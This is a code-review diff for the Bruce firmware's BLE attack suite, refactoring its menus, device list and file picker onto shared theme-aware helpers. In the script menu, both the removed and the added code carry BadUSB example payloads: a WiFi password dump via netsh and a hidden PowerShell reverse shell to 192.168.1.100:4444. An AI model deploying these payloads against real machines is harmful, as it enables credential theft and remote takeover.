### PR TITLE
BLE Suite: rebuild the interface on Bruce's frame and theme

### DIFF
--- a/src/modules/ble/BLE_Suite.cpp
+++ b/src/modules/ble/BLE_Suite.cpp
@@ -23,6 +23,7 @@
 #include "modules/NRF24/nrf_jammer_api.h"
 #include <SD.h>
 #include <algorithm>
+#include <functional>
 #include <esp_heap_caps.h>
 #include <esp_random.h>
 #include <globals.h>
@@ -2972,6 +2973,182 @@ bool DoSAttackServiceClass::advertisingSpam(NimBLEAddress target) {
 // File Operations
 //=============================================================================
 
+//=============================================================================
+// Shared UI helpers
+//
+// Every screen here used to hardcode its own frame, palette and pixel grid.
+// The grid assumed a tall panel: on a 135px Cardputer the menus fit two rows
+// and the device list exactly one, which is why a long list lost all sense of
+// place. These helpers derive the layout from the display and take every
+// colour from the active theme, so the suite matches the rest of Bruce.
+//=============================================================================
+
+struct BleUiGeom {
+    int listL, listW; // list rectangle
+    int top;          // first row
+    int rowH;
+    int rows;  // rows that actually fit
+    int footY; // hint / position line
+};
+
+static BleUiGeom bleUiGeom() {
+    BleUiGeom g;
+    g.listL = 8;
+    g.listW = tftWidth - 16;
+    g.top = BORDER_PAD_Y + 8 * FM + 3; // just below the Bruce title
+    g.footY = tftHeight - 8 * FP - 6;
+    g.rowH = 8 * FP + 6;
+    int avail = g.footY - g.top - 2;
+    if (avail < g.rowH) avail = g.rowH;
+    g.rows = avail / g.rowH;
+    if (g.rows < 1) g.rows = 1;
+    return g;
+}
+
+// Secondary and highlight shades of the theme, using the core helper so this
+// module stops inventing its own fixed greys and whites.
+static uint16_t bleDim() { return getColorVariation(bruceConfig.priColor, 8, -1); }
+static uint16_t bleAccent() { return getColorVariation(bruceConfig.priColor, 8, 1); }
+
+// Trims to fit `maxPx`, measuring real glyph width instead of counting
+// characters, so proportional titles and names stop overflowing.
+static String bleFit(const String &text, int maxPx) {
+    if (maxPx <= 0) return "";
+    if (tft.textWidth(text.c_str()) <= maxPx) return text;
+    String s = text;
+    while (s.length() > 1 && tft.textWidth((s + "..").c_str()) > maxPx) s.remove(s.length() - 1);
+    return s + "..";
+}
+
+// Legacy call sites pass a fixed TFT_ constant to say how bad the news is,
+// chosen back when it was the background of a full-screen flood. Several pass
+// TFT_BLACK, which is invisible once the screen follows the theme, so map the
+// intent onto a marker colour instead of drawing it as text.
+static uint16_t bleSeverity(uint16_t legacy) {
+    switch (legacy) {
+        case TFT_GREEN:
+        case TFT_DARKGREEN: return TFT_GREEN;
+        case TFT_RED: return TFT_RED;
+        case TFT_ORANGE:
+        case TFT_YELLOW: return TFT_ORANGE;
+        default: return bruceConfig.priColor;
+    }
+}
+
+// Splits `text` into lines that fit `w`, measuring glyphs rather than assuming
+// a 6px cell.
+static void bleWrapInto(const String &text, int w, std::vector<String> &out) {
+    tft.setTextSize(FP);
+    const int len = text.length();
+    if (len == 0) {
+        out.push_back("");
+        return;
+    }
+    int start = 0;
+    while (start < len) {
+        int end = start, lastSpace = -1;
+        while (end < len) {
+            if (text.charAt(end) == ' ') lastSpace = end;
+            if (tft.textWidth(text.substring(start, end + 1).c_str()) > w) break;
+            end++;
+        }
+        int cut = (end >= len) ? len : (lastSpace > start ? lastSpace : end);
+        out.push_back(text.substring(start, cut));
+        start = (cut < len && text.charAt(cut) == ' ') ? cut + 1 : cut;
+    }
+}
+
+// Four-step signal meter, so RSSI reads at a glance instead of as a number.
+static void bleDrawRssi(int x, int y, int rssi, uint16_t color) {
+    int bars = 0;
+    if (rssi > -55) bars = 4;
+    else if (rssi > -68) bars = 3;
+    else if (rssi > -80) bars = 2;
+    else if (rssi > -92) bars = 1;
+    for (int i = 0; i < 4; i++) {
+        int h = 2 + i * 2;
+        if (i < bars) tft.fillRect(x + i * 3, y + 8 - h, 2, h, color);
+        else tft.drawFastHLine(x + i * 3, y + 7, 2, color);
+    }
+}
+
+typedef std::function<void(int idx, int x, int y, int w, bool selected)> BleRowDrawer;
+
+// Scrollable list wearing the standard Bruce frame. Returns the chosen index or
+// -1 when the user backs out; `cursor` carries the selection in and out so a
+// menu reopens where it was left. Only the list body is repainted between key
+// presses, so moving the cursor no longer flashes the whole screen.
+static int bleListLoop(
+    const char *title, int count, const String &hint, BleRowDrawer drawRow, int *cursor = nullptr
+) {
+    if (count <= 0) return -1;
+    BleUiGeom g = bleUiGeom();
+    int sel = (cursor && *cursor >= 0 && *cursor < count) ? *cursor : 0;
+    int off = 0, lastSel = -1, lastOff = -1;
+
+    if (sel >= g.rows) off = sel - g.rows + 1;
+    drawMainBorderWithTitle(title);
+
+    for (;;) {
+        if (sel != lastSel || off != lastOff) {
+            tft.setTextSize(FP);
+            for (int i = 0; i < g.rows; i++) {
+                int y = g.top + i * g.rowH;
+                int idx = off + i;
+                bool selected = (idx == sel);
+                tft.fillRect(
+                    g.listL,
+                    y - 2,
+                    g.listW,
+                    g.rowH,
+                    selected ? bruceConfig.priColor : bruceConfig.bgColor
+                );
+                if (idx < count) drawRow(idx, g.listL + 3, y, g.listW - 6, selected);
+            }
+
+            // Position readout: the list is windowed, so say where we are.
+            tft.fillRect(g.listL, g.footY, g.listW, 8 * FP, bruceConfig.bgColor);
+            tft.setTextSize(FP);
+            String pos = String(sel + 1) + "/" + String(count);
+            int posW = tft.textWidth(pos.c_str());
+            tft.setTextColor(bleDim(), bruceConfig.bgColor);
+            tft.drawString(bleFit(hint, g.listW - posW - 8), g.listL, g.footY, 1);
+            tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+            tft.drawRightString(pos, g.listL + g.listW, g.footY, 1);
+
+            lastSel = sel;
+            lastOff = off;
+            if (cursor) *cursor = sel;
+        }
+
+        if (check(EscPress)) return -1;
+        else if (check(PrevPress) || check(UpPress)) sel = (sel > 0) ? sel - 1 : count - 1;
+        else if (check(NextPress) || check(DownPress)) sel = (sel < count - 1) ? sel + 1 : 0;
+        else if (check(SelPress)) {
+            if (cursor) *cursor = sel;
+            return sel;
+        }
+
+        if (sel < off) off = sel;
+        if (sel >= off + g.rows) off = sel - g.rows + 1;
+        if (off > count - g.rows) off = std::max(0, count - g.rows);
+        if (off < 0) off = 0;
+        vTaskDelay(20 / portTICK_PERIOD_MS);
+    }
+}
+
+// Numbered text rows, used by the menus.
+static BleRowDrawer bleTextRow(const char *const *items) {
+    return [items](int idx, int x, int y, int w, bool sel) {
+        uint16_t fg = sel ? bruceConfig.bgColor : bruceConfig.priColor;
+        uint16_t bg = sel ? bruceConfig.priColor : bruceConfig.bgColor;
+        const int cw = FP * LW;
+        tft.setTextColor(fg, bg);
+        tft.drawString(String(idx + 1) + ".", x, y, 1);
+        tft.drawString(bleFit(items[idx], w - 4 * cw), x + 4 * cw, y, 1);
+    };
+}
+
 String selectFileFromSD() {
     if (!setupSdCard()) {
         showErrorMessage("SD Card not found");
@@ -3004,100 +3181,20 @@ String selectFileFromSD() {
         return "";
     }
 
-    int selected = 0, scrollOffset = 0;
-    int lastSelected = -1, lastScrollOffset = -1;
-    bool exitMenu = false;
-    int menuStartY = 60, menuItemHeight = 25;
-    int maxVisibleItems = (tftHeight - menuStartY - 50) / menuItemHeight;
-    if (maxVisibleItems > fileCount) maxVisibleItems = fileCount;
+    // Rows own their own drawing so the file list follows the same geometry and
+    // palette as every other list in the suite.
+    BleRowDrawer row = [&files](int idx, int x, int y, int w, bool sel) {
+        tft.setTextSize(FP);
+        tft.setTextColor(
+            sel ? bruceConfig.bgColor : bruceConfig.priColor,
+            sel ? bruceConfig.priColor : bruceConfig.bgColor
+        );
+        tft.drawString(bleFit(files[idx], w), x, y, 1);
+    };
 
-    while (!exitMenu) {
-        if (selected != lastSelected || scrollOffset != lastScrollOffset) {
-            tft.fillScreen(bruceConfig.bgColor);
-            tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-
-            tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-            tft.setTextSize(2);
-            tft.setCursor((tftWidth - strlen("SD CARD FILES") * 12) / 2, 15);
-            tft.print("SD CARD FILES");
-            tft.setTextSize(1);
-
-            tft.setTextColor(TFT_YELLOW, bruceConfig.bgColor);
-            tft.setCursor(20, 40);
-            tft.print("Found: ");
-            tft.print(fileCount);
-            tft.print(" files");
-
-            for (int i = 0; i < maxVisibleItems && (scrollOffset + i) < fileCount; i++) {
-                int fileIdx = scrollOffset + i;
-                int yPos = menuStartY + (i * menuItemHeight);
-                if (yPos + menuItemHeight > tftHeight - 45) break;
-
-                if (fileIdx == selected) {
-                    tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, TFT_WHITE);
-                    tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                    tft.setCursor(25, yPos + 8);
-                    tft.print("> ");
-                } else {
-                    tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, bruceConfig.bgColor);
-                    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                    tft.setCursor(25, yPos + 8);
-                    tft.print("  ");
-                }
-
-                String displayName = files[fileIdx];
-                if (displayName.length() > 28) displayName = displayName.substring(0, 25) + "...";
-                tft.print(displayName);
-            }
-
-            if (fileCount > maxVisibleItems) {
-                tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-                tft.setCursor(tftWidth - 25, menuStartY + 5);
-                if (scrollOffset > 0) tft.print("^");
-                tft.setCursor(tftWidth - 25, menuStartY + (maxVisibleItems * menuItemHeight) - 20);
-                if (scrollOffset + maxVisibleItems < fileCount) tft.print("v");
-            }
-
-            tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-            tft.setCursor(20, tftHeight - 30);
-            tft.print("SEL: Select  PREV/NEXT: Navigate");
-            tft.setCursor(20, tftHeight - 20);
-            tft.print("ESC: Back");
-
-            lastSelected = selected;
-            lastScrollOffset = scrollOffset;
-            TouchFooter();
-        }
-
-        if (check(EscPress)) {
-            delay(200);
-            exitMenu = true;
-            return "";
-        } else if (check(PrevPress)) {
-            delay(150);
-            if (selected > 0) {
-                selected--;
-                if (selected < scrollOffset) scrollOffset = selected;
-            } else {
-                selected = fileCount - 1;
-                scrollOffset = std::max(0, fileCount - maxVisibleItems);
-            }
-        } else if (check(NextPress)) {
-            delay(150);
-            if (selected < fileCount - 1) {
-                selected++;
-                if (selected >= scrollOffset + maxVisibleItems) scrollOffset = selected - maxVisibleItems + 1;
-            } else {
-                selected = 0;
-                scrollOffset = 0;
-            }
-        } else if (check(SelPress)) {
-            delay(200);
-            return files[selected];
-        }
-        delay(50);
-    }
-    return "";
+    int cursor = 0;
+    int chosen = bleListLoop("SD Files", fileCount, "SEL open  ESC back", row, &cursor);
+    return (chosen < 0) ? String("") : files[chosen];
 }
 
 bool loadScriptFromSD(const String &filename) {
@@ -3137,120 +3234,45 @@ String getScriptFromUser() {
     scripts[scriptCount++] = "Load from SD";
     scripts[scriptCount++] = "Cancel";
 
-    int selected = 0, scrollOffset = 0;
-    int lastSelected = -1, lastScrollOffset = -1;
-    bool exitMenu = false;
-    int menuStartY = 60, menuItemHeight = 25;
-    int maxVisibleItems = (tftHeight - menuStartY - 50) / menuItemHeight;
-    if (maxVisibleItems > scriptCount) maxVisibleItems = scriptCount;
+    BleRowDrawer row = [&scripts](int idx, int x, int y, int w, bool sel) {
+        tft.setTextSize(FP);
+        tft.setTextColor(
+            sel ? bruceConfig.bgColor : bruceConfig.priColor,
+            sel ? bruceConfig.priColor : bruceConfig.bgColor
+        );
+        tft.drawString(bleFit(scripts[idx], w), x, y, 1);
+    };
 
-    while (!exitMenu) {
-        if (selected != lastSelected || scrollOffset != lastScrollOffset) {
-            tft.fillScreen(bruceConfig.bgColor);
-            TouchFooter();
-            tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
+    int cursor = 0;
+    int chosen = bleListLoop("Select Script", scriptCount, "SEL run  ESC back", row, &cursor);
+    if (chosen < 0 || chosen == scriptCount - 1) return ""; // cancelled
 
-            tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-            tft.setTextSize(2);
-            tft.setCursor((tftWidth - strlen("SELECT SCRIPT") * 12) / 2, 15);
-            tft.print("SELECT SCRIPT");
-            tft.setTextSize(1);
+    if (scripts[chosen] == "Load from SD") {
+        String filename = selectFileFromSD();
+        if (!filename.isEmpty() && loadScriptFromSD(filename)) return globalScript;
+        return "";
+    }
 
-            for (int i = 0; i < maxVisibleItems && (scrollOffset + i) < scriptCount; i++) {
-                int scriptIdx = scrollOffset + i;
-                int yPos = menuStartY + (i * menuItemHeight);
-                if (yPos + menuItemHeight > tftHeight - 45) break;
-
-                if (scriptIdx == selected) {
-                    tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, TFT_WHITE);
-                    tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                    tft.setCursor(25, yPos + 8);
-                    tft.print("> ");
-                } else {
-                    tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, bruceConfig.bgColor);
-                    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                    tft.setCursor(25, yPos + 8);
-                    tft.print("  ");
-                }
-
-                String displayName = scripts[scriptIdx];
-                if (displayName.length() > 28) displayName = displayName.substring(0, 25) + "...";
-                tft.print(displayName);
-            }
-
-            if (scriptCount > maxVisibleItems) {
-                tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-                tft.setCursor(tftWidth - 25, menuStartY + 5);
-                if (scrollOffset > 0) tft.print("^");
-                tft.setCursor(tftWidth - 25, menuStartY + (maxVisibleItems * menuItemHeight) - 20);
-                if (scrollOffset + maxVisibleItems < scriptCount) tft.print("v");
-            }
-
-            tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-            tft.setCursor(20, tftHeight - 30);
-            tft.print("SEL: Select  PREV/NEXT: Navigate");
-            tft.setCursor(20, tftHeight - 20);
-            tft.print("ESC: Back");
-
-            lastSelected = selected;
-            lastScrollOffset = scrollOffset;
-        }
-
-        if (check(EscPress)) {
-            delay(200);
-            exitMenu = true;
-            return "";
-        } else if (check(PrevPress)) {
-            delay(150);
-            if (selected > 0) {
-                selected--;
-                if (selected < scrollOffset) scrollOffset = selected;
-            } else {
-                selected = scriptCount - 1;
-                scrollOffset = std::max(0, scriptCount - maxVisibleItems);
-            }
-        } else if (check(NextPress)) {
-            delay(150);
-            if (selected < scriptCount - 1) {
-                selected++;
-                if (selected >= scrollOffset + maxVisibleItems) scrollOffset = selected - maxVisibleItems + 1;
-            } else {
-                selected = 0;
-                scrollOffset = 0;
-            }
-        } else if (check(SelPress)) {
-            delay(200);
-
-            if (selected == scriptCount - 1) return "";
-            else if (scripts[selected] == "Load from SD") {
-                String filename = selectFileFromSD();
-                if (!filename.isEmpty() && loadScriptFromSD(filename)) return globalScript;
-                return "";
-            } else if (scripts[selected].startsWith("Example: ")) {
-                String scriptName = scripts[selected].substring(9);
-                if (scriptName == "Open Calculator") {
-                    return "GUI r\nDELAY 500\nSTRING calc\nDELAY 300\nENTER";
-                } else if (scriptName == "Open CMD/Terminal") {
-                    return "GUI r\nDELAY 500\nSTRING cmd\nDELAY 300\nENTER";
-                } else if (scriptName == "WiFi Credentials") {
-                    return "GUI r\nDELAY 500\nSTRING cmd\nDELAY 300\nENTER\nDELAY 500\nSTRING netsh wlan "
-                           "show profile name=* key=clear\nDELAY 300\nENTER";
-                } else if (scriptName == "Reverse Shell") {
-                    return "GUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $client = "
-                           "New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = "
-                           "$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = "
-                           "$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName "
-                           "System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | "
-                           "Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = "
-                           "([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$"
-                           "sendbyte.Length);$stream.Flush()};$client.Close()\nENTER";
-                } else if (scriptName == "Rickroll") {
-                    return "GUI r\nDELAY 500\nSTRING https://www.youtube.com/watch?v=dQw4w9WgXcQ\nDELAY "
-                           "300\nENTER";
-                }
-            }
-        }
-        delay(50);
+    String scriptName = scripts[chosen].startsWith("Example: ") ? scripts[chosen].substring(9) : "";
+    if (scriptName == "Open Calculator") {
+        return "GUI r\nDELAY 500\nSTRING calc\nDELAY 300\nENTER";
+    } else if (scriptName == "Open CMD/Terminal") {
+        return "GUI r\nDELAY 500\nSTRING cmd\nDELAY 300\nENTER";
+    } else if (scriptName == "WiFi Credentials") {
+        return "GUI r\nDELAY 500\nSTRING cmd\nDELAY 300\nENTER\nDELAY 500\nSTRING netsh wlan "
+               "show profile name=* key=clear\nDELAY 300\nENTER";
+    } else if (scriptName == "Reverse Shell") {
+        return "GUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $client = "
+               "New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = "
+               "$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = "
+               "$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName "
+               "System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | "
+               "Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = "
+               "([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$"
+               "sendbyte.Length);$stream.Flush()};$client.Close()\nENTER";
+    } else if (scriptName == "Rickroll") {
+        return "GUI r\nDELAY 500\nSTRING https://www.youtube.com/watch?v=dQw4w9WgXcQ\nDELAY "
+               "300\nENTER";
     }
     return "";
 }
@@ -4177,26 +4199,11 @@ String selectTargetFromScan(const char *title) {
     // Clear previous results before scanning
     g_pBLEScan->clearResults();
 
-    tft.fillScreen(bruceConfig.bgColor);
-    tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-    TouchFooter();
-
-    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-    tft.setTextSize(2);
-    String titleStr = String(title);
-    int maxTitleWidth = tftWidth - 20;
-    if (tft.textWidth(titleStr.c_str()) > maxTitleWidth) {
-        while (titleStr.length() > 0 && tft.textWidth((titleStr + "...").c_str()) > maxTitleWidth) {
-            titleStr.remove(titleStr.length() - 1);
-        }
-        titleStr += "...";
-    }
-    tft.setCursor(10, 15);
-    tft.print(titleStr);
-    tft.setTextSize(1);
-
-    tft.setCursor(20, 60);
-    tft.print("Scanning for devices...");
+    BleUiGeom sg = bleUiGeom();
+    drawMainBorderWithTitle(title);
+    tft.setTextSize(FP);
+    tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+    tft.drawString("Scanning for devices...", sg.listL, sg.top, 1);
 
     int activeScanTime = ACTIVE_SCAN_TIME;
     int passiveScanTime = PASSIVE_SCAN_TIME;
@@ -4208,8 +4215,8 @@ String selectTargetFromScan(const char *title) {
 
     // === ACTIVE SCAN ===
     g_pBLEScan->setActiveScan(true);
-    tft.setCursor(20, 80);
-    tft.print("Active scan (" + String(activeScanTime) + "s)...");
+    tft.setTextColor(bleDim(), bruceConfig.bgColor);
+    tft.drawString("Active scan (" + String(activeScanTime) + "s)...", sg.listL, sg.top + sg.rowH, 1);
 
     try {
         BLEScanResults activeResults = g_pBLEScan->getResults(activeScanTime * 1000, false);
@@ -4245,8 +4252,10 @@ String selectTargetFromScan(const char *title) {
 
         // === PASSIVE SCAN ===
         g_pBLEScan->setActiveScan(false);
-        tft.setCursor(20, 100);
-        tft.print("Passive scan (" + String(passiveScanTime) + "s)...");
+        tft.setTextColor(bleDim(), bruceConfig.bgColor);
+        tft.drawString(
+            "Passive scan (" + String(passiveScanTime) + "s)...", sg.listL, sg.top + 2 * sg.rowH, 1
+        );
 
         BLEScanResults passiveResults = g_pBLEScan->getResults(passiveScanTime * 1000, false);
 
@@ -4292,21 +4301,7 @@ String selectTargetFromScan(const char *title) {
 
     DeviceSnapshot *snapshot = scannerData.getSnapshot();
     if (!snapshot || snapshot->count == 0) {
-        tft.fillScreen(TFT_YELLOW);
-        tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_BLACK);
-        tft.setTextColor(TFT_BLACK, TFT_YELLOW);
-        tft.setTextSize(2);
-        tft.setCursor((tftWidth - tft.textWidth("NO DEVICES")) / 2, 15);
-        tft.print("NO DEVICES");
-        tft.setTextSize(1);
-        tft.setCursor(20, 60);
-        tft.print("No BLE devices found!");
-        tft.setCursor(20, 80);
-        tft.print("Make sure BLE devices are");
-        tft.setCursor(20, 100);
-        tft.print("turned on and in range.");
-        TouchFooter();
-        delay(2000);
+        displayWarning("No BLE devices in range", true);
         return "";
     }
 
@@ -4338,98 +4333,63 @@ String selectTargetFromScan(const char *title) {
         }
     }
 
-    int deviceItemHeight = 30, menuStartY = 60;
-    int maxVisibleDevices = (tftHeight - 45 - menuStartY) / deviceItemHeight;
-    if (maxVisibleDevices < 1) maxVisibleDevices = 1;
-    int selectedIdx = 0, scrollOffset = 0;
-    int lastSelected = -1, lastScrollOffset = -1;
+    // One row per device: ordinal, name, MAC tail, capability tags and a signal
+    // meter. Tags reserve their width before the name is measured, so a long
+    // name can no longer push the vulnerability markers off screen.
+    BleRowDrawer deviceRow = [snapshot](int idx, int x, int y, int w, bool sel) {
+        uint16_t fg = sel ? bruceConfig.bgColor : bruceConfig.priColor;
+        uint16_t bg = sel ? bruceConfig.priColor : bruceConfig.bgColor;
+        uint16_t dim = sel ? bruceConfig.bgColor : bleDim();
+        const int cw = FP * LW;
+        tft.setTextSize(FP);
+
+        // the ordinal is the ID the list never had
+        tft.setTextColor(fg, bg);
+        tft.drawString(String(idx + 1), x, y, 1);
+        int cur = x + 3 * cw;
+        int right = x + w;
+
+        bleDrawRssi(right - 11, y, snapshot->rssi[idx], fg);
+        right -= 15;
+
+        String tags;
+        if (snapshot->fastPair[idx]) tags += " FP";
+        if (snapshot->hfp[idx]) tags += " HFP";
+        if (snapshot->types[idx] & 0x01) tags += " AUD";
+        if (snapshot->types[idx] & 0x02) tags += " HID";
+        if (tags.length()) {
+            int tw = tft.textWidth(tags.c_str());
+            tft.setTextColor(sel ? bruceConfig.bgColor : bleAccent(), bg);
+            tft.drawString(tags, right - tw, y, 1);
+            right -= tw + 2;
+        }
+
+        // last two MAC octets tell apart devices advertising the same name
+        String mac = snapshot->addresses[idx];
+        String name = snapshot->names[idx];
+        String tail = (mac.length() >= 5) ? mac.substring(mac.length() - 5) : mac;
+        int tailW = name.equalsIgnoreCase(mac) ? 0 : tft.textWidth(tail.c_str()) + 4;
+        if (right - cur < tailW + 8 * cw) tailW = 0; // too narrow, the name wins
+
+        tft.setTextColor(fg, bg);
+        tft.drawString(bleFit(name, right - cur - tailW), cur, y, 1);
+        if (tailW) {
+            tft.setTextColor(dim, bg);
+            tft.drawRightString(tail, right, y, 1);
+        }
+    };
+
+    int selectedIdx = 0;
     bool exitLoop = false;
 
     while (!exitLoop) {
-        if (selectedIdx != lastSelected || scrollOffset != lastScrollOffset) {
-            tft.fillScreen(bruceConfig.bgColor);
-            tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-            TouchFooter();
-
-            tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-            tft.setTextSize(2);
-            tft.setCursor((tftWidth - tft.textWidth("SELECT DEVICE")) / 2, 15);
-            tft.print("SELECT DEVICE");
-            tft.setTextSize(1);
-
-            tft.setTextColor(TFT_YELLOW, bruceConfig.bgColor);
-            tft.setCursor(20, 40);
-            tft.print("Found: ");
-            tft.print(deviceCount);
-            tft.print(" devices");
-
-            for (int i = 0; i < maxVisibleDevices && (scrollOffset + i) < (int)deviceCount; i++) {
-                int idx = scrollOffset + i;
-                int yPos = menuStartY + (i * deviceItemHeight);
-                if (yPos + deviceItemHeight > tftHeight - 45) break;
-
-                String displayText = snapshot->names[idx];
-                if (displayText.length() > 18) displayText = displayText.substring(0, 15) + "...";
-                displayText += " (" + String(snapshot->rssi[idx]) + "dB)";
-                if (snapshot->fastPair[idx]) displayText += " [FP]";
-                if (snapshot->hfp[idx]) displayText += " [HFP]";
-                if (snapshot->types[idx] & 0x01) displayText += " [AUDIO]";
-                if (snapshot->types[idx] & 0x02) displayText += " [HID]";
-
-                if (idx == selectedIdx) {
-                    tft.fillRect(15, yPos, tftWidth - 30, deviceItemHeight - 5, TFT_WHITE);
-                    tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                    tft.setCursor(20, yPos + 10);
-                    tft.print("> ");
-                } else {
-                    tft.fillRect(15, yPos, tftWidth - 30, deviceItemHeight - 5, bruceConfig.bgColor);
-                    tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                    tft.setCursor(20, yPos + 10);
-                    tft.print("  ");
-                }
-                tft.print(displayText);
-            }
-
-            if (deviceCount > (size_t)maxVisibleDevices) {
-                tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-                tft.setCursor(tftWidth - 25, menuStartY + 10);
-                if (scrollOffset > 0) tft.print("^");
-                tft.setCursor(tftWidth - 25, menuStartY + (maxVisibleDevices * deviceItemHeight) - 15);
-                if (scrollOffset + maxVisibleDevices < (int)deviceCount) tft.print("v");
-            }
-
-            tft.setTextColor(TFT_GREEN, bruceConfig.bgColor);
-            tft.setCursor(20, tftHeight - 30);
-            tft.print("SEL: Select  PREV/NEXT: Navigate");
-            tft.setCursor(20, tftHeight - 20);
-            tft.print("ESC: Back");
-
-            lastSelected = selectedIdx;
-            lastScrollOffset = scrollOffset;
-        }
-
-        if (check(EscPress)) {
+        int chosen = bleListLoop(
+            "Select Device", (int)deviceCount, "SEL pick  ESC back", deviceRow, &selectedIdx
+        );
+        if (chosen < 0) {
             exitLoop = true;
-        } else if (check(PrevPress)) {
-            delay(150);
-            if (selectedIdx > 0) {
-                selectedIdx--;
-                if (selectedIdx < scrollOffset) scrollOffset = selectedIdx;
-            } else {
-                selectedIdx = deviceCount - 1;
-                scrollOffset = std::max(0, (int)deviceCount - maxVisibleDevices);
-            }
-        } else if (check(NextPress)) {
-            delay(150);
-            if (selectedIdx < (int)deviceCount - 1) {
-                selectedIdx++;
-                if (selectedIdx >= scrollOffset + maxVisibleDevices)
-                    scrollOffset = selectedIdx - maxVisibleDevices + 1;
-            } else {
-                selectedIdx = 0;
-                scrollOffset = 0;
-            }
-        } else if (check(SelPress)) {
+        } else {
+            selectedIdx = chosen;
             String selectedMAC = snapshot->addresses[selectedIdx];
             String selectedName = snapshot->names[selectedIdx];
 
@@ -4463,110 +4423,70 @@ String selectMultipleTargetsFromScan(const char *title, std::vector<NimBLEAddres
         return "";
     }
 
-    std::vector<bool> selected(snapshot->count, false);
-    int currentIndex = 0, scrollOffset = 0;
-    bool exitMenu = false;
-    // size_t deviceCount = snapshot->count;
     size_t deviceCount = scannerData.deviceAddresses.size();
-    int menuStartY = 60, menuItemHeight = 25;
-    int maxVisibleItems = (tftHeight - menuStartY - 50) / menuItemHeight;
-    if (maxVisibleItems > (int)deviceCount) maxVisibleItems = deviceCount;
+    std::vector<bool> picked(deviceCount, false);
 
-    while (!exitMenu) {
-        tft.fillScreen(bruceConfig.bgColor);
-        tft.drawRect(5, 5, tftWidth - 10, tftHeight - 10, TFT_WHITE);
-        TouchFooter();
+    // The old screen advertised "NEXT: Confirm" but no key ever confirmed, so
+    // the only way out was ESC, which cleared the selection - the success path
+    // was unreachable. A trailing row now does the confirming, which also keeps
+    // the whole flow on the four keys every device has.
+    int rowCount = (int)deviceCount + 1;
+    int cursor = 0;
 
-        tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-        tft.setTextSize(2);
-        tft.setCursor((tftWidth - tft.textWidth(title)) / 2, 15);
-        tft.print(title);
-        tft.setTextSize(1);
+    BleRowDrawer row = [snapshot, &picked, &targets, deviceCount](
+                           int idx, int x, int y, int w, bool sel
+                       ) {
+        uint16_t fg = sel ? bruceConfig.bgColor : bruceConfig.priColor;
+        uint16_t bg = sel ? bruceConfig.priColor : bruceConfig.bgColor;
+        const int cw = FP * LW;
+        tft.setTextSize(FP);
+        tft.setTextColor(fg, bg);
 
-        tft.setTextColor(TFT_YELLOW, bruceConfig.bgColor);
-        tft.setCursor(20, 40);
-        tft.print("Selected: ");
-        tft.print(targets.size());
-        tft.print("/");
-        tft.print(deviceCount);
-
-        for (int i = 0; i < maxVisibleItems && (scrollOffset + i) < (int)deviceCount; i++) {
-            int idx = scrollOffset + i;
-            int yPos = menuStartY + (i * menuItemHeight);
-            if (yPos + menuItemHeight > tftHeight - 45) break;
-
-            if (idx == currentIndex) {
-                tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, TFT_WHITE);
-                tft.setTextColor(TFT_BLACK, TFT_WHITE);
-                tft.setCursor(25, yPos + 8);
-                tft.print(selected[idx] ? "[X] " : "[ ] ");
-            } else {
-                tft.fillRect(20, yPos, tftWidth - 40, menuItemHeight - 3, bruceConfig.bgColor);
-                tft.setTextColor(TFT_WHITE, bruceConfig.bgColor);
-                tft.setCursor(25, yPos + 8);
-                tft.print(selected[idx] ? "[X] " : "[ ] ");
-            }
-
-            String display = snapshot->names[idx] + " | " + snapshot->addresses[idx];
-            if (display.length() > 25) display = display.substring(0, 22) + "...";
-            tft.print(display);
+        if (idx >= (int)deviceCount) {
+            tft.drawString("> Confirm (" + String(targets.size()) + ")", x, y, 1);
+            return;
         }
 
-        if (deviceCount > (size_t)maxVisibleItems) {
-            tft.setTextColor(TFT_CYAN, bruceConfig.bgColor);
-            tft.setCursor(tftWidth - 25, menuStartY + 5);
-            if (scrollOffset > 0) tft.print("^");
